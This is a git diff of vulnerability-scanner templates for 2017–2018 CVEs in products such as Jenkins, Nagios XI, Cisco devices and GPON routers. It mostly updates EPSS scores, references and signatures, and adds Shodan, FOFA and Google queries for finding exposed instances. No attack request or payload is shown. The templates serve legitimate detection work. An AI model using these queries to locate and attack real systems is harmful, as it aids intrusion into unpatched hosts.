info: cve-id: CVE-2017-9833 cwe-id: CWE-22 epss-score: 0.7354 - epss-percentile: 0.98027 + epss-percentile: 0.98104 cpe: cpe:2.3:a:boa:boa:0.94.14.21:*:*:*:*:*:*:* metadata: max-request: 1 @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c6c5530e8a0f7728fab4cc19d39ab606e55af708d754eddf2173d358e60e8520022056dcf2c7ef111692f117a4df198df23d7ffdb051dbf23191bd3d3c8f2e81eaed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100becb5b5f455cc2352342a916d40b8b3e767f4bb590ec0663ab0c43a8209036aa02207064fc85e40379fbe38b9715412a026a67a8c3556926dec684adb5320f215f33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-0127.yaml b/http/cves/2018/CVE-2018-0127.yaml index 3cd87f31de..2ee61183cf 100644 --- a/http/cves/2018/CVE-2018-0127.yaml +++ b/http/cves/2018/CVE-2018-0127.yaml @@ -14,13 +14,14 @@ info: - http://web.archive.org/web/20211207054802/https://securitytracker.com/id/1040345 - https://nvd.nist.gov/vuln/detail/CVE-2018-0127 - http://www.securitytracker.com/id/1040345 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-0127 cwe-id: CWE-306,CWE-200 epss-score: 0.09982 - epss-percentile: 0.94323 + epss-percentile: 0.94853 cpe: cpe:2.3:o:cisco:rv132w_firmware:1.0.0.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -47,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e232f0baa386a961ae8b970d4e146a2cc11ceb1732f26c2ef20295955e73a350022100baa328e6e710e562eb6cfa8e6f546f7d5da7d2d218cc08f888d389993d3211a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203b1c0946541693aca213fa88998f586c3530aee37c8ff6124163eb7cf846ab2f022100d71414aeee0ed44f7cc4620c564f10d312e85bd7fb2e8335d1d804b84c955c45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-0296.yaml b/http/cves/2018/CVE-2018-0296.yaml index 8b46d15dc0..3a466eb67e 100644 --- a/http/cves/2018/CVE-2018-0296.yaml +++ b/http/cves/2018/CVE-2018-0296.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-0296 cwe-id: CWE-22,CWE-20 - epss-score: 0.97411 - epss-percentile: 0.99921 + epss-score: 0.97436 + epss-percentile: 0.99942 cpe: cpe:2.3:a:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ea84d5647989707121d9843e455bcda230a00c0e7cda6d49b7de19e4413ba116022100a43113bc957e23871b7cf6e215c873464e5b1a00ca3dde56d09993a71a3849a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008af1e43091782e1af2423e141c3da97415d149fd0261a1ab3ce84cc7527b3e130220304cc1e9e1af31da18863343285053049f62e22b903a7fbca5d355f587d5060d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000129.yaml b/http/cves/2018/CVE-2018-1000129.yaml index c7ad561227..796752264f 100644 --- a/http/cves/2018/CVE-2018-1000129.yaml +++ b/http/cves/2018/CVE-2018-1000129.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-1000129 cwe-id: CWE-79 epss-score: 0.00257 - epss-percentile: 0.64818 + epss-percentile: 0.65435 cpe: cpe:2.3:a:jolokia:jolokia:1.3.7:*:*:*:*:*:*:* metadata: max-request: 2 @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ceae38b96d248c63737a82c437c72e4a369cf651d1c2371f95595a2622cc58d302210086e805d7edbfb0a898eacff9a76969da740278209f40b3ba6cba2e5d615cfa16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d13910ea51e10912ef8a7920f88602a7c375f607fd520c36d87b3e87222226ca02205885520f34c9569d052fafa49195b92d66c1d535316bea0686be5d5a582f3365:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000130.yaml b/http/cves/2018/CVE-2018-1000130.yaml index 6322e6368f..d3c30ba92a 100644 --- a/http/cves/2018/CVE-2018-1000130.yaml +++ b/http/cves/2018/CVE-2018-1000130.yaml @@ -14,13 +14,15 @@ info: - https://jolokia.org/#Security_fixes_with_1.5.0 - https://access.redhat.com/errata/RHSA-2018:2669 - https://nvd.nist.gov/vuln/detail/CVE-2018-1000130 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/SexyBeast233/SecBooks classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2018-1000130 cwe-id: CWE-74 epss-score: 0.89191 - epss-percentile: 0.98492 + epss-percentile: 0.9873 cpe: cpe:2.3:a:jolokia:webarchive_agent:1.3.7:*:*:*:*:*:*:* metadata: max-request: 1 @@ -54,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202738b8f849e2ff4cc3b3029c5fa5990ddaa02ff6f7dd9d8bfc66cd4e143726e002205dda92656c7b74f10e3a011a74db4fb26e23385d8f5feb67eb0f5c111f526f12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206994805bfe4800c98a7123de3e07dd8d4eb8acd1a998e52f4e5f4358b9f56dc502205ed9dfc8fc39f4989d9c2cd237d55365ba24b29b63e822461ec17bb65c97a7fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000226.yaml b/http/cves/2018/CVE-2018-1000226.yaml index 5eb5e5ebfa..7373c504d5 100644 --- a/http/cves/2018/CVE-2018-1000226.yaml +++ b/http/cves/2018/CVE-2018-1000226.yaml @@ -18,12 +18,15 @@ info: cve-id: CVE-2018-1000226 cwe-id: CWE-732 epss-score: 0.01309 - epss-percentile: 0.8563 + epss-percentile: 0.85899 cpe: cpe:2.3:a:cobblerd:cobbler:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cobblerd product: cobbler + shodan-query: http.title:"cobbler web interface" + fofa-query: title="cobbler web interface" + google-query: intitle:"cobbler web interface" tags: cve2018,cve,cobbler,auth-bypass,cobblerd http: @@ -69,4 +72,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201a7c5859f426d96f45cd86e280a49186d9b9ea388944c9ac9aa3c03a68f61219022100faca8e8923400b4cdf7ce1d714dde9bf2ed095375ead8f2870d6385412ee7e4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220609deac75fd737e3a2aa1b519296137b11cc191a9d5547b71acb4e8306dd4d73022100d47122768361558b11c3f427fb14b94d25b8186bdd1d3861421e95da2b1b8308:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000533.yaml b/http/cves/2018/CVE-2018-1000533.yaml index d240447832..30a24812d5 100644 --- a/http/cves/2018/CVE-2018-1000533.yaml +++ b/http/cves/2018/CVE-2018-1000533.yaml @@ -27,6 +27,7 @@ info: max-request: 2 vendor: gitlist product: gitlist + shodan-query: cpe:"cpe:2.3:a:gitlist:gitlist" tags: cve,cve2018,git,gitlist,vulhub,rce http: @@ -55,4 +56,4 @@ http: - '(.*?)' internal: true part: body -# digest: 4a0a0047304502205d2c71f20fa19a22bd2be637fb9f250481422ea2c7a2f6a04beeec5e09b179ff0221008da783bdf386a1fcc3b2a3eb7663a56d1e4486680f94795bd3a365ba2542a2c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200f81ce3e13f27d57d6da8c69097e3f825ffe0487277515de76774c7a7694b022022100b7b600dafbc5c43e69246a4f582585a5384579f5a124b72709f0d7e74b67413f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000671.yaml b/http/cves/2018/CVE-2018-1000671.yaml index 009d5c0c00..016da87fa4 100644 --- a/http/cves/2018/CVE-2018-1000671.yaml +++ b/http/cves/2018/CVE-2018-1000671.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2018-1000671 cwe-id: CWE-601 - epss-score: 0.00598 - epss-percentile: 0.77958 + epss-score: 0.00422 + epss-percentile: 0.74167 cpe: cpe:2.3:a:sympa:sympa:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: vendor: sympa product: sympa shodan-query: http.html:"sympa" + fofa-query: body="sympa" tags: cve,cve2018,redirect,sympa,debian http: @@ -41,4 +42,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a0047304502204e16f5d026a87fbad38aac592766dd6e68435602edbec28fe2e6270fafc0d437022100b08c758a888bb461050d16dce5bf53016a9a5c643a58e4b347f17111f5cb0bf2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022028e11e18259c866430979aed335d87e9013da4ad6269891e35178b6c514e1d5a022100cf6f6e9a1f027d12c9dd2ab6bdd0b897b3e17b49b313c9d1e85d763df05f738e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000856.yaml b/http/cves/2018/CVE-2018-1000856.yaml index dcc69a343c..7d3091378f 100644 --- a/http/cves/2018/CVE-2018-1000856.yaml +++ b/http/cves/2018/CVE-2018-1000856.yaml @@ -19,8 +19,8 @@ info: cvss-score: 4.8 cve-id: CVE-2018-1000856 cwe-id: CWE-79 - epss-score: 0.00092 - epss-percentile: 0.38207 + epss-score: 0.00069 + epss-percentile: 0.30035 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205e60ba8ac7b7b68b9dcb58a31e4b4083007aa34e42c8dbc2d4750a2e0242c4ef022100b9eb8ca7486f72fde65b1b901b782329f828735d4b45ec7c80b345137845b021:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207d90ae1fac1b0db54f1d7a8e1f3eef2eb844417c05891f1804fb128088eb1d00022066c3f64a9240b442390e30adbf000b7b79f88529a42d94fdc60527fb2e78324a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000861.yaml b/http/cves/2018/CVE-2018-1000861.yaml index cd9da547aa..1a1c0a8d0f 100644 --- a/http/cves/2018/CVE-2018-1000861.yaml +++ b/http/cves/2018/CVE-2018-1000861.yaml @@ -20,13 +20,18 @@ info: cvss-score: 9.8 cve-id: CVE-2018-1000861 cwe-id: CWE-502 - epss-score: 0.9734 - epss-percentile: 0.99882 + epss-score: 0.9732 + epss-percentile: 0.99878 cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* metadata: max-request: 1 vendor: jenkins product: jenkins + shodan-query: + - http.favicon.hash:81586312 + - cpe:"cpe:2.3:a:jenkins:jenkins" + - product:"jenkins" + fofa-query: icon_hash=81586312 tags: cve2018,cve,packetstorm,kev,vulhub,rce,jenkins http: @@ -44,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a0e0d200c13ff780452945498a6718daad53e9ac916fec0ae1d8ec8279d22c87022026d4243303647e6e1fa58d9a299d869d55e93ab4c51fdffbfba18684c231c7f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a6c4995ba633770616bbe918b4285a3447434ee8c0032d8e6efe64ed670b6534022100ad1f5c93698c99068f359f021e95da37a818ef149219d6d27be38ef9eb20f0a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10095.yaml b/http/cves/2018/CVE-2018-10095.yaml index f58ca72664..2afe7736bf 100644 --- a/http/cves/2018/CVE-2018-10095.yaml +++ b/http/cves/2018/CVE-2018-10095.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-10095 cwe-id: CWE-79 epss-score: 0.95296 - epss-percentile: 0.99203 + epss-percentile: 0.99346 cpe: cpe:2.3:a:dolibarr:dolibarr:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e638c1656a8815e12d2d2ad818bc56561808d9c56e7840b10d09443cdb5a4fcb022100acbf92f5d9af6213135181dfd35e83357559a6ab1db83c6db9d5a36579e22287:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201ab33550c9971f20a65798766c82385bc8e6fe158999548e9a1a8124597210e00220214c234455df0e7be4bc246ef96843d14c08d85ad76a5b1cc620b3c7e885d79c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10141.yaml b/http/cves/2018/CVE-2018-10141.yaml index e170b2d02c..a9968160a8 100644 --- a/http/cves/2018/CVE-2018-10141.yaml +++ b/http/cves/2018/CVE-2018-10141.yaml @@ -20,12 +20,16 @@ info: cve-id: CVE-2018-10141 cwe-id: CWE-79 epss-score: 0.00126 - epss-percentile: 0.46296 + epss-percentile: 0.47275 cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: paloaltonetworks product: pan-os + shodan-query: + - http.favicon.hash:"-631559155" + - cpe:"cpe:2.3:o:paloaltonetworks:pan-os" + fofa-query: icon_hash="-631559155" tags: cve,cve2018,panos,vpn,globalprotect,xss,paloaltonetworks http: @@ -48,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022018f9350a51b781627e508e4ea73cb51e957d0a25e20e8c48fddab20c83c420de022100e3b19a249e90117477ab0f47433355e22b384c3b92322dd9200df419034324be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d08aac5132c6f1ecd5ed168ffed4a16fc09da3e88e4ba23e2ba67ceb409a0d9f02203f9845352398faae5c089124e2aef8dc7eec2b7c1e7af04bd29668b974a4b949:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10230.yaml b/http/cves/2018/CVE-2018-10230.yaml index feadcb357a..acb615a5fd 100644 --- a/http/cves/2018/CVE-2018-10230.yaml +++ b/http/cves/2018/CVE-2018-10230.yaml @@ -14,18 +14,20 @@ info: - https://www.synacktiv.com/ressources/zend_server_9_1_3_xss.pdf - https://www.zend.com/en/products/server/release-notes - https://nvd.nist.gov/vuln/detail/CVE-2018-10230 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-10230 cwe-id: CWE-79 - epss-score: 0.00122 - epss-percentile: 0.46318 + epss-score: 0.00106 + epss-percentile: 0.43069 cpe: cpe:2.3:a:zend:zend_server:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zend product: zend_server + shodan-query: cpe:"cpe:2.3:a:zend:zend_server" tags: cve,cve2018,xss,zend http: @@ -50,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201423fd900a1cd2dcf52028722c5f7a43f8b6d20d5a5b65d58f59ffed42a8f6ff02205da25d220a25b5faef2f03778f2b749c7a385c901429baf839f1815fc1681d28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f62401c6854adf72b1d6c095bdd461658e7b790d8777a4707b2841a1da5bc016022033d5570e096e0b6e18a06bbd68fcf7374b18858f7a242e483f7a3a8a5e5e0382:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10562.yaml b/http/cves/2018/CVE-2018-10562.yaml index 5ddf231497..80d1969d83 100644 --- a/http/cves/2018/CVE-2018-10562.yaml +++ b/http/cves/2018/CVE-2018-10562.yaml @@ -14,13 +14,14 @@ info: - https://github.com/f3d0x0/GPON/blob/master/gpon_rce.py - https://nvd.nist.gov/vuln/detail/CVE-2018-10562 - https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/ + - https://github.com/ethicalhackeragnidhra/GPON classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-10562 cwe-id: CWE-78 - epss-score: 0.97441 - epss-percentile: 0.99945 + epss-score: 0.97423 + epss-percentile: 0.99934 cpe: cpe:2.3:o:dasannetworks:gpon_router_firmware:-:*:*:*:*:*:*:* metadata: max-request: 2 @@ -56,4 +57,4 @@ http: part: interactsh_request words: - "User-Agent: {{useragent}}" -# digest: 4a0a00473045022100eff8002cdfe102f6a45b3310a529b3082ffce269cf60f0c09c44bf7d7ffbd0480220239d1b6bfa938a51d3f70bafedef9c3b99f833dfb44e2580e054d49a0a86147e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022076907511f4f625fb84a997087590fa36dac01d612d1802c6b579d54c508c623e02203ef2be0b835b4c686a29db3a4afcd4875d69783fc68a917690ddb802c2401758:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10735.yaml b/http/cves/2018/CVE-2018-10735.yaml index 2d033c66f6..f04a7953cb 100644 --- a/http/cves/2018/CVE-2018-10735.yaml +++ b/http/cves/2018/CVE-2018-10735.yaml @@ -22,9 +22,13 @@ info: max-request: 1 vendor: nagios product: nagios_xi - fofa-query: app="Nagios-XI" + shodan-query: http.title:"nagios xi" + fofa-query: + - app="Nagios-XI" + - title="nagios xi" + - app="nagios-xi" + google-query: intitle:"nagios xi" tags: cve,cve2018,nagios,sqli - variables: num: "{{rand_int(2000000000, 2100000000)}}" @@ -38,4 +42,4 @@ http: part: body words: - "{{md5(num)}}" -# digest: 490a00463044022035a7d92fb1c6bdc0292d17ac1a892eff48264d750e529eaa1738dc451e31382702204c7fd46d051494a76df2f08a648ed4cac0cadb12ea23ac096fa34020eb4e2fa1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201c354727727f1f14efb82c00e579f038af14c48aeabf7b91da8eac187c50396402201f20485af6a91b6ee5cd89d0d1eaeb6c4b73c89af6109f6a1ef4900d2408ed03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10736.yaml b/http/cves/2018/CVE-2018-10736.yaml index ac3bcd34f2..957580521d 100644 --- a/http/cves/2018/CVE-2018-10736.yaml +++ b/http/cves/2018/CVE-2018-10736.yaml @@ -15,17 +15,21 @@ info: cvss-score: 7.2 cve-id: CVE-2018-10736 cwe-id: CWE-89 - epss-score: 0.00403 - epss-percentile: 0.7323 + epss-score: 0.01861 + epss-percentile: 0.88359 cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: nagios product: nagios_xi - fofa-query: app="Nagios-XI" + shodan-query: http.title:"nagios xi" + fofa-query: + - app="Nagios-XI" + - title="nagios xi" + - app="nagios-xi" + google-query: intitle:"nagios xi" tags: cve,cve2018,nagios,sqli - variables: num: "{{rand_int(2000000000, 2100000000)}}" @@ -39,4 +43,4 @@ http: part: body words: - "{{md5(num)}}" -# digest: 4b0a0048304602210096f6d47bc3a2fd2ff957df8bdb5367c2223cc113bd088a105e29d264e9bc7de102210090f4905b4787b7185c8c9495b3de6a65eb1aa90ca66a3e97e77904bdc1d13a09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220380054dbdf1f81a72097d9acc8f469ae8928137e73a3776f9c827da18c2bb79d02205f0ee05e01189342bf924f0915d1da2c211d30e28ff194c9d6576d64bc92770b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10737.yaml b/http/cves/2018/CVE-2018-10737.yaml index 816ec7a586..ade789eb5a 100644 --- a/http/cves/2018/CVE-2018-10737.yaml +++ b/http/cves/2018/CVE-2018-10737.yaml @@ -22,9 +22,13 @@ info: max-request: 1 vendor: nagios product: nagios_xi - fofa-query: app="Nagios-XI" + shodan-query: http.title:"nagios xi" + fofa-query: + - app="Nagios-XI" + - title="nagios xi" + - app="nagios-xi" + google-query: intitle:"nagios xi" tags: cve,cve2018,nagios,sqli - variables: num: "{{rand_int(2000000000, 2100000000)}}" @@ -42,4 +46,4 @@ http: part: body words: - "{{md5(num)}}" -# digest: 4b0a00483046022100f949d4089c1e58b578466210669aa11213a35c30675c334422db2a397452a130022100efde25a1cf6d6e04b0272e13b7dbedaa4967cdef95f25098659f2153a00df361:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a0bc85e3468d486bf2bf30d05b0a67161eaff97274ffd8c0a64e1b13d5d6b0f9022067b6ba5d51273f34f28228be2afd9e12f9d7bfa1af1f5db22d81579286f5e99d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10738.yaml b/http/cves/2018/CVE-2018-10738.yaml index 9c37617a2b..8d35580bf5 100644 --- a/http/cves/2018/CVE-2018-10738.yaml +++ b/http/cves/2018/CVE-2018-10738.yaml @@ -14,17 +14,21 @@ info: cvss-score: 7.2 cve-id: CVE-2018-10738 cwe-id: CWE-89 - epss-score: 0.00403 - epss-percentile: 0.7323 + epss-score: 0.01861 + epss-percentile: 0.88359 cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: nagios product: nagios_xi - fofa-query: app="Nagios-XI" + shodan-query: http.title:"nagios xi" + fofa-query: + - app="Nagios-XI" + - title="nagios xi" + - app="nagios-xi" + google-query: intitle:"nagios xi" tags: cve,cve2018,nagios,sqli - variables: num: "{{rand_int(2000000000, 2100000000)}}" @@ -41,4 +45,4 @@ http: part: body words: - "{{md5(num)}}" -# digest: 490a0046304402202285ef8eb065ed205938c23f3c003cc2d946d8ab8a6c8c1bd97862cebffd6db60220284522e629f3ac4055349fd664d75a2645f27c19f847da1cb7aa77df38fd73b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202002a30ee0c0f4bf08b704df011b9339a525693d56454bb8c48535b88d18d9fd02210098c5aabbadb83cf8d1e0536b1ee7278a177447ef3a5a8e61f6162cc2c9d05062:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10823.yaml b/http/cves/2018/CVE-2018-10823.yaml index c4a9a91a38..5a5b5ef2e9 100644 --- a/http/cves/2018/CVE-2018-10823.yaml +++ b/http/cves/2018/CVE-2018-10823.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2018-10823 cwe-id: CWE-78 - epss-score: 0.96737 - epss-percentile: 0.99597 + epss-score: 0.96759 + epss-percentile: 0.9967 cpe: cpe:2.3:o:dlink:dwr-116_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203c3b74b5fd566685fbad5b11a5f88f2cbbaeb6a44476e6e1a11c8846c395474c022026262baad879004dfb8e0433aa4206ea581bcd723c00763109d0eba3f5af5e98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202dd28b31608a43a3c4493267bee160bb0604051c8b413fceb611ee5bf2f78a560221009055db2ddb25f781a71fc23746b17aca5f10baf45be8f347f20ef73c917bfbca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10942.yaml b/http/cves/2018/CVE-2018-10942.yaml index 9e6acac4b7..50eba65214 100644 --- a/http/cves/2018/CVE-2018-10942.yaml +++ b/http/cves/2018/CVE-2018-10942.yaml @@ -11,11 +11,19 @@ info: - https://www.openservis.cz/prestashop-blog/nejcastejsi-utoky-v-roce-2023-seznam-deravych-modulu-nemate-nejaky-z-nich-na-e-shopu-i-vy/ - https://nvd.nist.gov/vuln/detail/CVE-2018-10942 classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2018-10942 + cwe-id: CWE-434 + epss-score: 0.18241 + epss-percentile: 0.96178 + cpe: cpe:2.3:a:attribute_wizard_project:attribute_wizard:1.6.9:*:*:*:*:prestashop:*:* metadata: max-request: 8 - tags: prestashop,attributewizardpro,intrusive,file-upload - + vendor: attribute_wizard_project + product: attribute_wizard + framework: prestashop + tags: prestashop,attributewizardpro,intrusive,file-upload,cve2018,cve,attribute_wizard_project variables: filename: '{{rand_base(7, "abc")}}' @@ -67,4 +75,4 @@ http: group: 1 regex: - '(.*?)\|\|\|\|' -# digest: 4b0a00483046022100aab26195eec27b220d615f8c9e60fbab9ae457867d1c4209eb5ae8cacfb3ca18022100a4cb00aa3b61687473a5a2627c73a4958334b53104f383a1c2e6513d003484a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220306be034b2c6b170199b07e94a79a0d21caeea7a68966b8044a4eb961bdcef07022008a3fe64accf4748a087aca163a0065561fa0c621c7a38123cbfbdcebb0acd9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10956.yaml b/http/cves/2018/CVE-2018-10956.yaml index a509b9736d..ebc2d728a8 100644 --- a/http/cves/2018/CVE-2018-10956.yaml +++ b/http/cves/2018/CVE-2018-10956.yaml @@ -21,14 +21,18 @@ info: cvss-score: 7.5 cve-id: CVE-2018-10956 cwe-id: CWE-22 - epss-score: 0.57917 - epss-percentile: 0.97652 + epss-score: 0.54195 + epss-percentile: 0.97627 cpe: cpe:2.3:a:ipconfigure:orchid_core_vms:2.0.5:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ipconfigure product: orchid_core_vms - shodan-query: http.title:"Orchid Core VMS" + shodan-query: + - http.title:"Orchid Core VMS" + - http.title:"orchid core vms" + fofa-query: title="orchid core vms" + google-query: intitle:"orchid core vms" tags: cve2018,cve,orchid,vms,lfi,edb,ipconfigure http: @@ -45,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f4b3ba62ada360ed542a1dc3aeb23fe810a3516b33b87653ac8cc1e848028c5b0221009dcb0edfc90ad78d55ad83bcfc106071329ffdb8ca67a671481c79a10b2a61cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202d36911cca2f0e661928025865ba5961aca8b4135a778b3b6147cafad1439894022068db9ab2aeeef60ece92f735f778f2fe5cfe6fa31e3a76970fdcb9b38777a424:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11227.yaml b/http/cves/2018/CVE-2018-11227.yaml index dd9501ca2f..efc806c9f4 100644 --- a/http/cves/2018/CVE-2018-11227.yaml +++ b/http/cves/2018/CVE-2018-11227.yaml @@ -30,6 +30,7 @@ info: vendor: monstra product: monstra_cms shodan-query: http.favicon.hash:419828698 + fofa-query: icon_hash=419828698 tags: cve,cve2018,xss,mostra,mostracms,cms,edb,monstra http: @@ -59,4 +60,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022074cd3bf33b0ec1ad4b73a00fa8f4cfde3b82a43929ed109dd58ad53b67201676022076a0f365907066a7d10d38ff9db65c72da72a1cf7dfce6c3a44502c6ae55bdcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e9e55724df8749ace8f579f6c441325aed843527785b06dc7575d60426297d970220098c8c73fed3d1499735eb40da07fabb36db006d2d8ecb643cb55996bc35aa28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11409.yaml b/http/cves/2018/CVE-2018-11409.yaml index 2787cb03f5..a60cd22d49 100644 --- a/http/cves/2018/CVE-2018-11409.yaml +++ b/http/cves/2018/CVE-2018-11409.yaml @@ -20,13 +20,16 @@ info: cvss-score: 5.3 cve-id: CVE-2018-11409 cwe-id: CWE-200 - epss-score: 0.81162 - epss-percentile: 0.98059 + epss-score: 0.83856 + epss-percentile: 0.98466 cpe: cpe:2.3:a:splunk:splunk:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: splunk product: splunk + shodan-query: http.title:"login - splunk" + fofa-query: title="login - splunk" + google-query: intitle:"login - splunk" tags: cve,cve2018,edb,splunk http: @@ -44,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b713a4f66f9d5d0e0c1621cb4d7346a8391dfcb9840a579aaf892c3aa5d3b62102210084e5a59025b33e6a132de272f100fa98b4e5478c6ffc88166ad534afe06b9d7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cd07a4f587efb7a03ad703943030c0d15b0ae71b806c289c224698f4eef6abcb02205ca713c9123f06ef5f09012ecfd93cca39eb076e651b36e07b6e0b15cce9e884:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11473.yaml b/http/cves/2018/CVE-2018-11473.yaml index b812c09865..c2cf62f4c7 100644 --- a/http/cves/2018/CVE-2018-11473.yaml +++ b/http/cves/2018/CVE-2018-11473.yaml @@ -20,8 +20,8 @@ info: 